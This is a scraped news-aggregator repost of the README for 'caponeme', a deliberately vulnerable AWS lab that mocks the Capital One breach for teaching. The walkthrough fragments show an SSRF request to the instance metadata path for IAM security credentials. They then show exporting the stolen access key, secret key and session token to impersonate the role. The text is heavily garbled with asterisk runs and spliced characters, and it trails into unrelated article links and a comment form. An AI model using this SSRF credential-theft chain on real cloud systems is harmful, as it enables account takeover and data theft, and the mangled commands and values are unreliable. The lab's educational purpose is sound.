in ,

avishayil / caponeme, Hacker news

avishayil / caponeme, Hacker news


                    

        

caponemeis a vulnerable cloud environment that meant to mock Capital One Breach for educational purposes

Click here to find out

  • Using the IAM role name you got on the previous step, discover the AWS credentials http: // 728 *****************************************************************. (**************************************************************. / latest / meta-data / iam / security-credentials / test-SSRFS3Role – SHRSPDNZFAK**************************
  • You’ll get something like:
  • ******************************************************************************: ********************************************************************************** (Z “}

  • (the the type the following on your terminal to impersonate the IAM role
  • (********************** export AWS_ACCESS_KEY_ID=”ASIASANNLTVCBCFP 445 O ” export AWS_SECRET_ACCESS_KEY=”v0osgTGnL0n 11 dHQA6xztS / ZuSS3p8yu JZ1cAxG ” export AWS_SESSION_TOKEN=”IQoJb3JpZ2luX2VjELb ////////// wEaCXVzLWVhc3QtMSJHMEUCIDneXlD6 JLk XRrQ4X LrBewvq / 9kIYRYhonnW5T9qAiEAmpuGWXeh4rqQ 22 gmiMU8NvKlxODFh 27 u5qubMpvC9Rkq0QIIHxABGgwxMzgzMzkzOTI4MzYiDCO / mt 42 DCCYPTmeJSquAstMGvng3WUgZXlgpm5NiJ RbYQvnmA1BmIt (LcJeoNpC) ****************************************************** MZhxpubTd (zWEqtriLRBXp7KoNQNX5K8ag5eY) *********************************************************************************************** R0giQssmidCFED9 N / uOgD1Tu 39 vaVEJoFhzKrd1lhFule3EOHFhImRRGsyfalfY7TWN0GaRNGZlanWdBswpkescM3O (G9J) ********************************************************************************************* (xeMO) ************************************************************************************************** ziu4ajonkCaG ​​ (r) / LKj5C1g2VfdXPp5sI0q5 qiG0YSXveN6mGqnN5NXAKNGd4ehYdo4Ot 09 niy0oS9xtDMLSTVu3XjaxGJwqF5fb4l8Q9zGFe3zA 94 UShK1uGRBWOfTMHZRwaGYRSTcwximDjEWO4UPKYa**************************************************************** (Es5d /) ****************************************************************************************************** (hJdwuFIXPC) i9LyBHXw / ayYn1xyH3bpBwBoYHiereBSuMmMNPG / 8FOs4CX hw3xx4pz2 / ibkiJ1hjh2 / Qu4KZtfTk4SN (q / EAgmP6dx6l / pRi T B7bGk cES0Ei uoTArK8STiO / W3PejELPeoWgy2av oiL / zt4xXI hNFdO1xXZXrBGaLbKTZRby MyrvmDw8GJpxmE1Pyt (pRjxdeQ0NLEcM) ************************************************************************************************************** (JHtxq0 /) ******************************************************************** tEUepsm0Z 6RUqXi9 / BSaP1tRzViApch (d8oJgWARZY5A1eX1d) *********************************************************************** (hCeCiGgNuZxPWC) H3lNXjSRC3dGrx3dI8IJwXgQgEj8e3QP4eeoN3 3H2XFlXE DopMy6P4ejk8c6Xdk (FbJZrTe1ZoulF2OxLfQbmCOcl) xqJyDEWuZleddagb3jr / Kp7X3Io4bgA cc0kuQEdLEkfWsKoE8G / uCkSy tFwn0eqAUmoLVqCxmXS ZOK3 VX1ax* (VX1ax) S1g==”
  • Press on
  • Attach inline policy, then apply the following policy:

  • Todos

  • ********************************************** (Read More) ***************** (****************************************

    What do you think?

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    GIPHY App Key not set. Please check settings

    Here Are the Top-Five NFL Quarterbacks of the 2010s, Crypto Coins News

    Here Are the Top-Five NFL Quarterbacks of the 2010s, Crypto Coins News

    Homemade GPS Receiver (2011), Hacker News